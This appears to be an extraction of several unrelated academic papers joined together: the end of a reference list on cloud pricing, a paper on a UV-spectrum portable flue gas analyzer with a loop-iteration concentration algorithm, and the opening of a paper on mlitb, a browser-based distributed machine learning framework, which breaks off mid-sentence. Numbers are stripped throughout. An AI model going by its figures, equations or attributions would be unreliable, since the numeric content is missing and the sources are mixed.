] r. buyya, c.s. yeo, and s. venugopal, “market oriented cloud computing: vision, hype, and reality for delivering it services as computing utilities,” proc. th ieee conference on high performance computing and communications (hpcc ), dalian, china, pp. - , sep. . [ ] m. armbrust, a. fox, r. griffith, a. d. joseph, r. katz, a. konwinski,g. lee, d. patterson, a. rabkin, i. stoica, and m. zaharia. a view of cloud computing. commun. acm, ( ): – , . [ ] s. k. garg, s. versteeg, and r. buyya. a framework for ranking of cloud computing services. future gneration computer systems, : – , . [ ] amazon ec . http://aws.amazon.com/ec /instance-types/.gogrid pricing. http://www.gogrid.com/pricing. [ ] q. wang, k. ren, and x. meng. when cloud meets ebay: towards effective pricing for cloud computing. in ieee infocom, . [ ] h. xu and b. li. dynamic cloud pricing for revenue maximization. ieee transactions on cloud computing, ( ): – , july . [ ] y. feng, b. li, and b. li. price competition in an oligopoly market with multiple iaas cloud providers. ieee transactions on computers, ( ): – , jan . [ ] d. fudenberg and j. tirole, game theory, mit press, cambridge, usa, . [ ] s.y. yun, y. yi, d. h. cho, et al. the economic effects of sharing femtocells. ieee transactions on selected areas in communications, ( ): - , april. . 
international conference on sensor network and computer engineering (icsnce ) the portable gas analyzer based on the spectrum xu shuping school of computer science and engineering xi’an technological university xi’an , china e-mail: @qq.com; xusp @ .com xu pei school of computer science and engineering xi’an technological university xi’an , china dong qiyu school of computer science and engineering xi’an technological university xi’an , china su xiaohui school of computer science and engineering xi’an technological university xi’an , china abstract—it is a problem of spectra analysis of flue gas that how to separate and calculate the concentration of different kinds of gas from continuous mixed gas absorption spectrum signal. so based on experimental data, a new iteration of the circular algorithm is put forward on the basis of lambert-beer's law. this algorithm, using the superposition of the absorbance, makes data nonlinear fitting. it takes the advantages of the wavelength optimum and the circular iteration to distinguishing the gas mixture of different composition. experimental results show that: this method can at once calculate a variety of harmful gas concentration and accuracy up to ± %. it has strong anti-jamming capability and is suitable for practical application of engineering. keywords-circular iteration; ultraviolet spectrum; micro-spectrometer; embedded systems i. introduction with the rapid development of economic and people living standard unceasing improvement the popularity of the development of heavy industry and transportation, with a large number of harmful substances into the environment atmosphere, changed the composition of normal air, worsen air quality[ ]. health problems, which caused by the atmospheric pollution has caused governments and people of great importance to it. therefore, monitoring so and nox become one of the important subject of environmental protection[ ]. for the accurate monitoring of the real-time quality, ecological environment and pollution to the environment, to provide accurate basis for the environmental protection departments at various levels supervision, management and environment decision, urgent need a large number of modern environmental monitoring instruments. through to the present situation of flue gas analyzer in the domestic and foreign research and analysis, portable flue gas on the domestic market at present the main monitoring method is electrochemical analysis instrument, infrared gas analyzer and differential absorption spectrum. electrochemical analysis instrument each sensor can only be measured a chemical composition in flue gas, if need to measure six ingredients you need six sensors. the chemical battery principle led to zero drift in the development of the system and cross interference, sensor lifetime is also difficult to solve the problem[ ]. there is no absorption peak to no in the infrared spectrum analyzer, cannot monitor no , but can only detect the no content, through the assumptions to no concentrations. at the same time as infrared spectrum analyzer adopts wheel filter method, each time only one gas measurement, can not measure a variety of gases at the same time[ ]. 
differential absorption methods measure gases using ultraviolet and visible light and invert gas concentrations from the strength of the differential absorption spectrum. in the traditional differential absorption algorithm, the least-squares estimation used to obtain optimal gas concentrations leads to complex equations and is prone to ill-conditioning[ ]. accordingly, based on the lambert-beer law and the additivity of absorbance, a mutually recursive iteration algorithm for decoding multiple gas concentrations is presented; the steps of the algorithm are described and its effectiveness is verified. using an ocean optics micro-spectrometer combined with embedded technology, we have developed a portable flue gas analyzer[ ]. this instrument overcomes the disadvantages of electrochemical sensors, including limited sensor lifetime, and at the same time measures several gases accurately without cross interference.

ii. working principle of the system

the portable flue gas analyzer consists of three parts: data acquisition, data processing, and human-computer interaction. the data acquisition part comprises a sampling probe, a flue gas sampling pump, an ultraviolet light source and a miniature spectrum analyzer; it uses the ultraviolet light source and the miniature spectrum analyzer to collect the spectra before and after the gas, convert them into digital signals and transmit them to the data processing part. the data processing part consists of an arm microcontroller cpu core module and peripheral circuits; its main task is to apply the corresponding algorithm to the collected electrical signals and calculate the concentration of each gas component in the flue gas. the human-computer interaction part consists of an lcd display and a keyboard, which provide real-time display of the gas concentrations and keyboard control over data storage and related parameter settings.

iii. the basic principle of the loop iteration method

a. lambert-beer law

the mathematical model of the lambert-beer law [ - ] is

    a = \lg \frac{1}{t} = k \, b \, c

in the formula: a is the absorbance; t is the transmittance, the ratio of the transmitted light intensity to the incident light intensity; c is the concentration of the light-absorbing substance; and b is the thickness of the absorption layer. its physical meaning is that when a beam of parallel monochromatic light passes perpendicularly through a uniform, non-scattering absorbing material, the absorbance is directly proportional to both the concentration of the absorbing substance and the thickness of the absorption layer. additivity of absorbance [ ]: if the components of a binary or multicomponent mixture all absorb at a given wavenumber, the total absorbance at that wavenumber is equal to the arithmetic sum of the absorbances of the individual components.

b. the mathematical model

the logarithmic form of the lambert-beer law, written in terms of photon counts, is

    a(λ) = \lg \frac{r - d}{s - d} = k \, c

in the formula: a is the absorbance; r is the photon count of the zero (reference) spectrum; s is the photon count of the transmitted spectrum; λ is the selected wavelength; k is a constant (associated with the wavelength and the length of the absorption tube); c is the concentration of a single gas; and d is the dark-spectrum photon count (related to the integration time, and can be taken as a fixed constant).
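as a small numeric illustration of this photon-count form, the sketch below converts a reference (zero-gas) count r, a transmitted count s and a dark count d into an absorbance and then into a concentration via the calibration constant k(λ). it is an illustrative example only, not instrument firmware, and all numeric values are placeholders rather than measured data.

    import math

    def absorbance(r, s, d):
        # a(lambda) = lg((r - d) / (s - d)) from photon counts at one wavelength
        return math.log10((r - d) / (s - d))

    def concentration(r, s, d, k):
        # invert a = k * c for a single absorbing gas; k is the calibration
        # constant for this wavelength and absorption path (assumed known)
        return absorbance(r, s, d) / k

    # placeholder counts: reference 52000, sample 41000, dark 1500, k = 0.004 per ppm
    print(concentration(52000.0, 41000.0, 1500.0, 0.004))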
for a mixture of two gases, the lambert-beer absorbance expressions can be written as

    a_1(λ) = \lg \frac{r - d}{s_1 - d}, \qquad a_2(λ) = \lg \frac{r - d}{s_2 - d}

according to the law of superposition for a binary mixture, a = a_1 + a_2, that is

    \lg \frac{r - d}{s - d} = \lg \frac{r - d}{s_1 - d} + \lg \frac{r - d}{s_2 - d}

i.e.

    \frac{r - d}{s - d} = \frac{r - d}{s_1 - d} \cdot \frac{r - d}{s_2 - d}    ( )

formula ( ) shows that, at a particular incident wavelength λ, the ratio of the dark-corrected incident photon count to the dark-corrected transmitted photon count for the mixed gas is equal to the product of the corresponding ratios that each gas would produce on its own at that wavelength.

in an actual measurement both absorption and scattering play a role in forming the spectrum, so the experimental absorption spectra contain two parts. one part is the absorption of photons by the gas molecules, which in the ultraviolet band is mainly caused by electronic transitions of the molecules. the other part is the non-selective attenuation of light caused by scattering from the gas or smoke. because this system uses extractive sampling, the flue gas first passes through a pretreatment device for filtration, drying, cooling and other processing. the filtration stage removes particles of . μm and above almost completely, while the diameters of the flue gas molecules are on the order of nanometers or below. the instrument operates at wavelengths between nm and nm, larger than the molecular or residual particle diameters, so the scattering produced by the gases to be detected is mainly rayleigh scattering by gas molecules. in actual operation we use nitrogen as the zero gas, and its spectral curve is called the zero-gas line; although nitrogen molecules absorb very little in the nm – nm ultraviolet band, they still produce rayleigh scattering, so the zero-gas line is the spectrum of the light after scattering by the zero gas. from the measured spectra we found that outside the absorption bands — for example outside the three absorption peaks of the nitric oxide line — the measured lines coincide with the zero-gas line; that is, where there is no gas absorption, the scattered light of the two gases is the same. the interference of rayleigh scattering with the gas absorption measurement can therefore be removed by using the zero-gas line as a reference. according to the lambert-beer law, with mie scattering and rayleigh scattering excluded from the gas detection in this way, the absorption model applicable to this device becomes

    \ln \frac{i_0(λ)}{i(λ)} = \sum_i σ_i(λ) \, l \, c_i    ( )

where i_0(λ) is the light intensity received by the spectrometer at wavelength λ after the light from the source has been scattered by the zero gas, σ_i(λ) is the absorption cross-section of the i-th gas at wavelength λ, l is the length of the absorption cell, and c_i is the concentration of the i-th gas. the total absorbance of the gas mixture is thus equal to the sum of the absorbances of the individual gases.
iv. circular iteration steps

the loop iteration method uses the characteristic absorption peaks of the various gases in the ~ nm band together with the additivity of absorbance. at a characteristic absorption point of one gas, the other gases are first assumed not to absorb, which yields an initial concentration for that gas; the method then switches to the characteristic absorption point of another gas, subtracts the photons absorbed by the first gas from the measured total, and obtains an initial concentration for the second gas, and so on until every gas has an initial concentration. the method then returns to the characteristic absorption point of the first gas, subtracts the photons absorbed by every other gas from the total, and obtains an updated concentration for the first gas; the other gas concentrations are updated in the same way. the iteration is repeated until the difference between two successive concentration estimates is smaller than a given value, at which point the concentration of each gas has been determined accurately. the algorithm steps are as follows.

step : solve for the initial concentration c_1 of the first gas in the mixture. select a characteristic wavelength λ_1 at which this gas has an obvious absorption peak while the other gases absorb only weakly, read the transmitted photon count s_1 at this wavelength, compute the absorbance a_1 = \lg \frac{r - d}{s_1 - d}, and obtain the concentration from the absorbance look-up table; this value is taken as the initial concentration of the first gas in the mixture.

step : solve for the initial concentration c_2 of the second gas. select a second characteristic wavelength λ_2 at which the second gas has an obvious absorption peak and the other gases absorb only weakly, read the transmitted photon count s_2, treat the measurement in this band as if only the two gases were present, calculate the absorbance of the second gas according to formula ( ), and invert it through the look-up table to obtain the second gas concentration, taken as its initial concentration.

step : compute the initial concentrations of the remaining gases in the same way: select the m-th characteristic wavelength λ_m at which the m-th gas has an obvious absorption peak, read the transmitted photon count s_m at that wavelength, and use formula ( ) together with the look-up table to invert the concentration of this gas, taken as its initial concentration c_m.

step : iterative inversion of the first gas. substitute the current estimates of all the other gas concentrations into formula ( ), read s_1 at λ_1 again, and invert an updated (first-order recursive) concentration c_1 for the first gas.

step : repeat the procedure of the second and third steps to obtain the updated first-order recursive concentration c_m of gas m.

step : compute the error between two adjacent iterations. the first-order iteration difference of each gas is

    δ_m = \left| c_m^{(1)} - c_m^{(0)} \right|

and the largest of these differences is taken as the iteration error,

    δ = \max \{ δ_1, δ_2, \ldots, δ_m \}

step : repeat the fourth, fifth and sixth steps until the iteration error is less than a given threshold, i.e. δ ≤ ε.

step : terminate the algorithm and take the concentrations from the last iteration as the final gas concentrations.
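the listing below is one way the loop above could be coded; it is an illustration written for this description, not the analyzer's firmware. it replaces the absorbance look-up table with a linear calibration matrix k[m][j] (the absorbance contributed by unit concentration of gas m at the characteristic wavelength of gas j) and updates all gases from the previous round's estimates, a jacobi-style variant of the sequential update described in the steps; a_total[j] is the measured total absorbance at the characteristic wavelength of gas j and eps is the stopping threshold. all of these names and the linear calibration are assumptions.

    def loop_iteration(a_total, k, eps=1e-4, max_iters=100):
        n = len(a_total)
        c = [0.0] * n                      # first round: assume no other gas absorbs
        for _ in range(max_iters):
            c_new = []
            for j in range(n):
                # subtract every other gas's contribution, then invert for gas j
                residual = a_total[j] - sum(k[m][j] * c[m] for m in range(n) if m != j)
                c_new.append(max(residual, 0.0) / k[j][j])
            delta = max(abs(c_new[j] - c[j]) for j in range(n))   # iteration error
            c = c_new
            if delta <= eps:
                break
        return c

with two gases this reduces to alternately correcting each gas's absorbance for the other's contribution, which is the interference-removal idea used in the next section.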
v. the experimental results and analysis

the absorption lines of the four gases so2, no, no2 and nh3 obtained in the experiments are shown in the figure. within the working wavelength range the four gases interfere with one another. at the first selected wavelength so2 and no absorb; at the second selected wavelength so2 and no also absorb; only at the third selected wavelength do no2, so2 and no all absorb; and at the fourth selected wavelength nh3, no and so2 absorb. so2 and no absorb at every selected wavelength point, so for nh3 and no2 the procedure is to determine the concentrations of so2 and no first and then subtract their contributions from the absorbance at the corresponding wavelength to obtain the absorbances of nh3 and no2. the concentrations of so2 and no are therefore calculated first, followed by the concentrations of nh3 and no2.

figure: mixed gas absorption spectrum.

a. calculate the concentration of so2 and no

knowing the concentrations of so2 and no is the premise for calculating the concentrations of nh3 and no2. however, so2 and no interfere with each other throughout the working band, so an algorithm is needed to eliminate their mutual interference. here the loop-iteration method, together with the look-up-table calculation, is used to determine the concentrations of so2 and no.

figure: the absorption spectrum of so2 and no.

as shown in the figure, so2 and no both absorb at the first and second selected wavelengths, but their absorption intensities at the two wavelengths differ greatly: the absorbance of no at the first wavelength is far smaller than the absorbance of the same concentration of no at the second wavelength, and the absorbance of so2 at the second wavelength is far smaller than the absorbance of the same concentration of so2 at the first wavelength. the absorption of no at the second wavelength is therefore called the main absorption of no, and its absorption at the first wavelength is called the interference with so2; likewise, the absorption of so2 at the first wavelength is its main absorption, and its absorption at the second wavelength interferes with the main absorption of no. the iterative method gradually eliminates the interference between no and so2 through cyclic calculation, approaching the true concentrations of so2 and no. the cyclic iteration method overcomes the problem that the corresponding simultaneous equations may have no solution, and it can easily be implemented in software. the calculated concentrations of so2 and no (in ppm) as a function of the number of iterations are shown in the figures, with the number of iterations on the abscissa and the concentration on the ordinate.

figure: calculated so2 concentration versus number of iterations.

figure: calculated no concentration versus number of iterations.

the running results show that the iteration is a successive-approximation process: the calculated so2 concentration decreases gradually as the number of iterations increases and tends to a stable value, whereas the no concentration behaves in the opposite way, increasing with the number of iterations. after two iterations the cyclic iterative method produces no obvious further change, that is, two iterations are sufficient. in this way the concentrations of no and so2 are obtained.

b. calculate the concentration of no2 and nh3

because the absorption of no2 and nh3 at the selected third and fourth wavelengths does not interfere with each other, their concentrations can be separated from the total absorbance and the already determined so2 and no concentrations, as follows.
suppose that the concentrations of no and so2 in the mixed gas have been obtained as $c_1$ and $c_2$, and let the concentrations of no2 and nh3 be $c_3$ and $c_4$. then at the third selected wavelength, according to the superposition of absorbance,

$$a = \lg\frac{i_0}{i} = a_{no} + a_{so_2} + a_{no_2}$$

where $a_{no}$ is the absorbance at this wavelength of no at concentration $c_1$, $a_{so_2}$ is the absorbance at this wavelength of so2 at concentration $c_2$, $a$ is the total absorbance of the gas mixture at this wavelength, and $a_{no_2}$ is the absorbance of no2. $i_0$ is the spectral intensity at this wavelength after the light passes through the zero gas and $i$ is the intensity after transmission through the mixed gas; both can be obtained directly from the spectrometer. $a_{no}$ and $a_{so_2}$ are obtained from the already determined concentrations $c_1$ and $c_2$, so the absorbance of no2 at this wavelength follows by subtraction, and the concentration of no2 is then calculated from the table relating concentration and absorbance at this wavelength. the absorbance of nh3 at the fourth selected wavelength can be obtained with the same method, and the nh3 concentration follows from the corresponding relationship between concentration and absorbance at that wavelength.

vi. conclusion

to meet the requirements for monitoring the main harmful components of atmospheric environmental pollution, a fast recursive-iteration inversion algorithm is proposed for solving the concentrations of the various harmful components measured with an ultraviolet grating-type continuous-spectrum method, and the effectiveness of the algorithm is validated. the portable flue gas analyzer based on this algorithm uses embedded technology and a miniature spectrometer for data acquisition; an ultraviolet light source and spectral analysis of the transmitted light are used to determine the flue gas concentrations, so that several gas components can be measured accurately at the same time with a single miniature spectrometer. the product has a compact structure, high measuring accuracy, strong anti-interference capability and high sensitivity, and has broad application prospects and popularization value.

acknowledgment

the authors wish to thank the cooperators. this research is partially funded by project funds of the shaanxi province department of education and project funds of the shaanxi province department of science industrial projects.

mlitb: machine learning in the browser. submitted march, accepted july, published july. corresponding author edward meeds, e.w.f.meeds@uva.nl. academic editor sebastian ventura. additional information and declarations can be found on page . doi . /peerj-cs. copyright meeds et al.
distributed under creative commons cc-by. open access.

mlitb: machine learning in the browser

edward meeds, remco hendriks, said al faraby, magiel bruntink and max welling. informatics institute, university of amsterdam, amsterdam, the netherlands.

abstract with few exceptions, the field of machine learning (ml) research has largely ignored the browser as a computational engine. beyond an educational resource for ml, the browser has vast potential to not only improve the state-of-the-art in ml research, but also, inexpensively and on a massive scale, to bring sophisticated ml learning and prediction to the public at large. this paper introduces mlitb, a prototype ml framework written entirely in javascript, capable of performing large-scale distributed computing with heterogeneous classes of devices. the development of mlitb has been driven by several underlying objectives whose aim is to make ml learning and usage ubiquitous (by using ubiquitous compute devices), cheap and effortlessly distributed, and collaborative. this is achieved by allowing every internet-capable device to run training algorithms and predictive models with no software installation and by saving models in universally readable formats. our prototype library is capable of training deep neural networks with synchronized, distributed stochastic gradient descent. mlitb offers several important opportunities for novel ml research, including: development of distributed learning algorithms, advancement of web gpu algorithms, novel field and mobile applications, privacy preserving computing, and green grid-computing. mlitb is available as open source software.

subjects data mining and machine learning, emerging technologies, mobile and ubiquitous computing, world wide web and web science, software engineering. keywords machine learning, pervasive computing, ubiquitous computing, social computing, mobile computing, client-server systems, distributed computing, crowdsourcing.

introduction

the field of machine learning (ml) currently lacks a common platform for the development of massively distributed and collaborative computing. as a result, there are impediments to leveraging and reproducing the work of other ml researchers, potentially slowing down the progress of the field. the ubiquity of the browser as a computational engine makes it an ideal platform for the development of massively distributed and collaborative ml. machine learning in the browser (mlitb) is an ambitious software development project whose aim is to bring ml, in all its facets, to an audience that includes both the general public and the research community. by writing ml models and algorithms in browser-based programming languages, many research opportunities become available. the most obvious is software compatibility: nearly all computing devices can collaborate in the training of ml models by contributing some computational resources to the overall training procedure and can, with the same code, harness the power of sophisticated predictive models on the same devices (see fig. 1). how to cite this article meeds et al. ( ), mlitb: machine learning in the browser. peerj comput. sci., doi . /peerj-cs.

figure 1 overview of mlitb. (1) a researcher sets up a learning problem in his/her browser.
(2) through the internet, grid and desktop machines contribute computation to solve the problem. (3) heterogeneous devices, such as mobile phones and tablets, connect to the same problem and contribute computation. at any time, connected clients can download the model configuration and parameters, or use the model directly in their browsing environment. icon made by freepik from www.flaticon.com.

this goal of ubiquitous ml has several important consequences: training ml models can now occur on a massive, even global scale, with minimal cost, and ml research can now be shared and reproduced everywhere, by everyone, making ml models a freely accessible, public good. in this paper, we present both a long-term vision for mlitb and a light-weight prototype implementation of mlitb, which represents a first step in completing the vision and is based on an important ml use-case, deep neural networks. in section 'mlitb: vision' we describe in more detail our vision for mlitb in terms of three main objectives: (1) make ml models and algorithms ubiquitous, for both the public and the scientific community, (2) create a framework for cheap distributed computing by harnessing existing infrastructure and personal devices as novel computing resources, and (3) design research closures, software objects that archive ml models, algorithms, and parameters to be shared, reused, and, in general, support reproducible research. in section 'mlitb: prototype' we describe the current state of the mlitb software implementation, the mlitb prototype. we begin with a description of our design choices, including arguments for using javascript and the other modern web libraries and utilities. then we describe a bespoke map-reduce synchronized event-loop, specifically designed for training a large class of ml models using distributed stochastic gradient descent (sgd). our prototype focuses on a specific ml model, deep neural networks (dnns), using an existing javascript implementation (karpathy, ), modified only slightly for mlitb. we also report results of a scaling experiment, demonstrating the feasibility, but also the engineering challenges, of using browsers for distributed ml applications. we then complete the prototype description with a walk-through of using mlitb to specify and train a neural network for image classification. mlitb is influenced and inspired by current volunteer computing projects. these and other related projects, including those from machine learning, are presented in section 'related work.' our prototype has exposed several challenges requiring further research and engineering; these are presented in section 'opportunities and challenges,' along with discussion of interesting application avenues mlitb makes possible.
the most urgent software development directions follow in section 'future mlitb development.' mlitb: vision our long-term vision for mlitb is guided by three overarching objectives: ubiquitous ml: models can be trained and executed in any web browsing environment without any further software installation. cheap distributed computing: algorithms can be executed on existing grid, cloud, etc., computing resources with minimal (and possibly no) software installation, and can be easily managed remotely via the web; additionally, small internet-enabled devices can contribute computational resources. reproducibility: mlitb should foster reproducible science with research closures, universally readable objects containing ml model specifications, algorithms, and parameters, that can be used seamlessly to achieve the first two objectives, as well as support sharing of ml models and collaboration within the research community and the public at large. ubiquitous machine learning the browser is the most ubiquitous computing device of our time, running, in some shape or form, on all desktops, laptops, and mobile devices. software for state-of-the-art ml algorithms and models, on the other hand, consists of very sophisticated libraries written in highly specific programming languages within the ml research community (bastien et al., ; jia et al., ; collobert, kavukcuoglu & farabet, ). as research tools, these software libraries have been invaluable. we argue, however, that to make ml truly ubiquitous requires writing ml models and algorithms with web programming languages and using the browser as the computational engine. the software we propose can run sophisticated predictive models on cell phones or super-computers; for the former, this extends the distributed nature of ml to a global internet. by further encapsulating the algorithms and model together, the benefit of powerful predictive modeling becomes a public commodity. cheap distributed computing the usage of web browsers as compute nodes provides the capability of running sophisticated ml algorithms without the expense and technical difficulty of using custom grid or super-computing facilities (e.g., hadoop cloud computing, shvachko et al. ( )). it has long been a dream to use volunteer computing to achieve real massive-scale computing. successes include seti@home (anderson et al., ) and protein folding (lane et al., ). mlitb is being developed not only to run natively on browsers but also for scaled distributed computing on existing cluster and/or grid resources and, by harnessing the capacity of non-traditional devices, for extremely massive-scale computing with a global volunteer base. in the former set-up, low communication overhead and homogeneous devices (a "typical" grid computing solution) can be exploited. in the latter, volunteer computing via the internet opens the scaling possibilities tremendously, albeit at the cost of unreliable compute nodes, variable power, limited memory, etc. both have serious implications for the user, but, most importantly, both are implemented by the same software. although the current version of mlitb does not provide gpu computing, it does not preclude its implementation in future versions. it is therefore possible to seamlessly provide gpu computing when available on existing grid computing resources.
using gpus on mobile devices is a more delicate proposition since power consumption management is of paramount importance for mobile devices. however, it is possible for mlitb to manage power intelligently by detecting, for example, whether the device is connected to a power source, its temperature, and whether it is actively used for other activities. a user might volunteer periodic "mini-bursts" of gpu power towards a learning problem with minimal disruption to or power consumption from their device. in other words, mlitb will be able to take advantage of the improvements and breakthroughs of gpu computing for web engines and mobile chips, with minimal software development and/or support. reproducible and collaborative research reproducibility is a difficult yet fundamental requirement for science (mcnutt, ). reproducibility is now considered just as essential for high-quality research as peer review; simply providing mathematical representations of models and algorithms is no longer considered acceptable (stodden, guo & ma, ). furthermore, merely replicating other work, despite its importance, can be given low publication priority (casadevall & fang, ) even though it is considered a prerequisite for publication. in other words, submissions must demonstrate that their research has been, or could be, independently reproduced. for ml research there is no reason for not providing working software that allows reproduction of results (for other fields in science, constraints restricting software publication may exist). currently, the main bottlenecks are the time cost to researchers for making research available, and the incompatibility of the research (i.e., code) for others, which further increases the time investment for researchers. one of our primary goals for mlitb is to provide reproducible research with minimal to no time cost to both the primary researcher and other researchers in the community. following stodden, borwein & bailey ( ), we support "setting the default to reproducible." for ml disciplines, this means other researchers should not only be able to use a model reported in a paper to verify the reported results, but also retrain the model using the reported algorithm. this higher standard is difficult and time-consuming to achieve, but fortunately this approach is being adopted more and more often, in particular by a sub-discipline of machine learning called deep learning. in the deep learning community, the introduction of new datasets and competitions, along with innovations in algorithms and modeling, has produced rapid progress on many ml prediction tasks. model collections (also called model zoos), such as those built with caffe (jia et al., ), make this collaboration explicit and easy to access for researchers. however, there remains a significant time investment to run any particular deep learning model (this includes compilation, library installations, platform dependencies, gpu dependencies, etc.). we argue that these are real barriers to reproducible research and that choosing ubiquitous software and compute engines makes it easier. for example, during our testing we converted a very performant computer vision model (lin, chen & yan, ) into json (javascript object notation, json.org) format and it can now be used on any browser with minimal effort.
in a nod to the concept of closures common in functional programming, our approach treats a learning problem as a research closure: a single object containing model and algorithm configuration plus code, along with model parameters, that can be executed (and therefore tested and analyzed) by other researchers. mlitb: prototype the mlitb project and its accompanying software (application programming interfaces (apis), libraries, etc.) are built entirely in javascript. we have taken a pragmatic software development approach to achieve as much of our vision as possible. to leverage our software development process, we have chosen, wherever possible, well-supported and actively developed external technology. by making these choices we have been able to quickly develop a working mlitb prototype that not only satisfies many of our objectives, but is as technologically future proof as possible. to demonstrate mlitb on a meaningful ml problem, we have similarly incorporated an existing javascript implementation of a deep neural network into mlitb. the full implementation of the mlitb prototype can be found on github (https://github.com/software-engineering-amsterdam/mlitb). why javascript? javascript is a pervasive web programming language, embedded in the large majority of web sites (w3techs, ). this pervasiveness means it is highly supported (can i use, ), and it is actively developed for efficiency and functionality (chrome v8, ; asm.js, ). as a result, javascript is the most popular programming language on github and its popularity is continuing to grow (ray et al., ). the main challenge for scientific computing with javascript is the lack of high-quality scientific libraries compared to platforms such as matlab and python. with the potential of native computational efficiency (or better, gpu computation) becoming available
for javascript, it is only a matter of time before javascript bridges this gap. a recent set of benchmarks showed that numerical javascript code can be competitive with native c (khan et al., ). general architecture and design design considerations the minimal requirements for mlitb are based on the scenario of running the network as public resource computing.
the downside of public resource computing is the lack of control over the computing environment. participants are free to leave (or join) the network at any time and their connectivity may be variable with high latency. mlitb is designed to be robust to these potentially destabilizing events. the loss of a participant results in the loss of computational power and data allocation. most importantly, mlitb must robustly handle new and lost clients, re-allocation of data, and client variability in terms of computational power, storage capacity, and network latency. although we are agnostic to the specific technologies used to fulfill the vision of mlitb, in practice we are guided by both the requirements of mlitb and our development constraints. therefore, as a first step towards implementing our vision, we chose technology pragmatically. our choices also follow closely the design principles for web-based big data applications (begoli & horey, ), which recommend popular standards and light-weight architectures. as we will see, some of our choices may be limiting at large scale, but they have permitted a successful small-scale mlitb implementation. figure 2 shows the high-level architecture and web technologies used in mlitb. modern web browsers provide functionality for two essential aspects of mlitb: web workers (w3c, ) for parallelizing program execution with threads and web sockets (ietf, ) for fast bi-directional communication channels to exchange messages more quickly between server and browser. to maintain compatibility across browser vendors, there is little choice for alternatives to web workers and web sockets. these same choices are also used in another browser-based distributed computing platform (cushing et al., ). on the server side, there are many choices that can be made based on scalability, memory management, etc. however, we chose node.js for the server application (http://nodejs.org). node.js provides several useful features for our application: it is lightweight, written in javascript, handles events asynchronously, and can serve many clients concurrently (tilkov & vinoski, ). asynchronous events occur naturally in mlitb as clients join/leave the network, client computations are received by the server, and users add new models and otherwise interact with the server. since the main computational load is carried by the clients, and not the server, a light-weight server that can handle many clients concurrently is all that is required by mlitb. design overview the general design of mlitb is composed of several parts. a master server hosts ml problems/projects and connects clients to them. the master server also manages the main event loop, where client-triggered events are handled, along with the reduce steps of a (bespoke) map-reduce procedure used for computation.

figure 2 mlitb architecture and technologies. (1) servers are node.js applications. the master server is the main server controlling communication between clients and hosts ml projects. (2) communication between the master server and clients occurs over web sockets.
(3) when heterogeneous devices connect to the master server they use web workers to perform different tasks. upon connection, a ui worker, or boss, is instantiated. web workers perform all the other tasks on a client and are controlled by the boss. see fig. 3 for details. (4) a special data worker on the client communicates with the data server using xhr. (5) the data server, also a node.js application, manages uploading of data in zip format and serves data vectors to the client data workers. icon made by freepik from www.flaticon.com.

when a browser (i.e., a heterogeneous device) makes an initial connection to the master server, a user-interface (ui) client (also known as a boss) is instantiated. through the ui, clients can add workers that can perform different tasks (e.g., train a model, download parameters, take a picture, etc.). an independent data server serves data to clients using zip files and prevents the master server from blocking while serving data. for efficiency, data transfer is performed using xhr (xmlhttprequest, www.w3.org/tr/xmlhttprequest). trained models can be saved into json objects at any point in the training process; these can later be loaded in lieu of creating new models. master server the master node (server) is implemented in node.js with communication between the master and slave nodes handled by web sockets. the master server hosts multiple ml
the mlitb network is dynamic and permits slave nodes to join and leave during processing. the master monitors its connections and is able to detect lost participants. when this occurs, data that was allocated to the lost client is re-allocated the remaining clients, if possible, otherwise it is marked as to be allocated. data server the data server is a bespoke application intended to work with our neural network use-case model and can be thought of a lightweight replacement for a proper image database. the data server is an independent node.js application that can, but does not necessarily live on the same machine. users upload data in zip files before training begins; currently, the data server handles zipped image classification datasets (where sub-directory names define class labels). data is then downloaded from the data server and zipped files are sent to clients using xhr and unzipped and processed locally. xhr is used instead of websockets because they communicate large zip-files more efficiently. a redundant cache of data is stored locally in the clients’ browser’s memory. for example, a client may store , data vectors, but at each iteration it may only have the computational power to process data vectors in its scheduled iteration duration. the data server uses specialized javascript apis unzip.js and redis-server. clients clients are browser connections from heterogeneous devices that visit the master server’s url. clients interact through a ui worker, called a boss, and can create slave workers to perform various tasks (see workers). the boss is the main worker running in a client’s browser. it manages the slave and image download worker and functions as a bridge between the downloader and slaves. a simple wrapper handles ui interactions, and provides input/output to the boss. client bosses use a data worker to download data from the data server using xhr. the data worker and server communicate using xhr and pass zip files in both directions. the boss handles unzipping and decoding data for slaves that request data. clients therefore require no software installation other than its native browser. clients can contribute to any project hosted by the master server. clients can trigger several events through the ui worker. these include adjusting hyper-parameters, adding data, and adding slave workers, etc. (fig. ). most tasks are run in a separate web worker thread (including the boss), ensuring a non-blocking and responsive client ui. data downloading is a special task that, via the boss and the data worker, uses xhr to download from the data server. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure mlitb client workers. each client connection to the master server initiates a ui worker, also known as a boss. for uploading data from a client to the data server and for downloading data from the data server to a client, a separate web worker called the data worker is used. users can add slaves through the ui worker; each slave performs a separate task using a web worker. icon made by freepik from www. flaticon.com. workers in fig. the tasks implemented using web worker threads are shown. at the highest-level is the client ui, with which the user interacts with ml problems and controls their slave workers. from the client ui, a user can create a new project, load a project from file, upload data to a project, or add slave workers for a project. 
slaves can perform several tasks; most important is the trainer, which connects to an event loop of a ml project and contributes to its computation (i.e., its map step). each slave worker communicates directly to the master server using web sockets. for the latter three tasks, the communication is mainly for sending requests for models parameters and receiving them. the training slave has more complicated behavior because it must download data then perform computation meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://dx.doi.org/ . /peerj-cs. as part of the main event loop. to begin training, the user sets the slave task to train and selects start/restart. this will trigger a join event at the master server; model parameters and data will be downloaded and the slave will begin computation upon completion of the data download. the user can remove a slave at any time. other slave tasks are tracking, which requires receiving model parameters from the master, and allows users to monitor statistics of the model on a dataset (e.g., classification error) or to execute the model (e.g., classify an image on a mobile device). each slave worker communicates directly to the master server using web sockets. events and software behavior the mlitb network is constructed as a master–slave relationship, with one server and multiple slave nodes (clients). the setup for computation is similar to a mapreduce network (dean & ghemawat, ); however, the master server performs many tasks during an iteration of the master event loop, including a reduce step, but also several other important tasks. the specific tasks will be dictated by events triggered by the client, such as requests for parameters, new client workers, removed/lost clients, etc. our master event loop can be considered as a synchronized map-reduce algorithm with a user defined 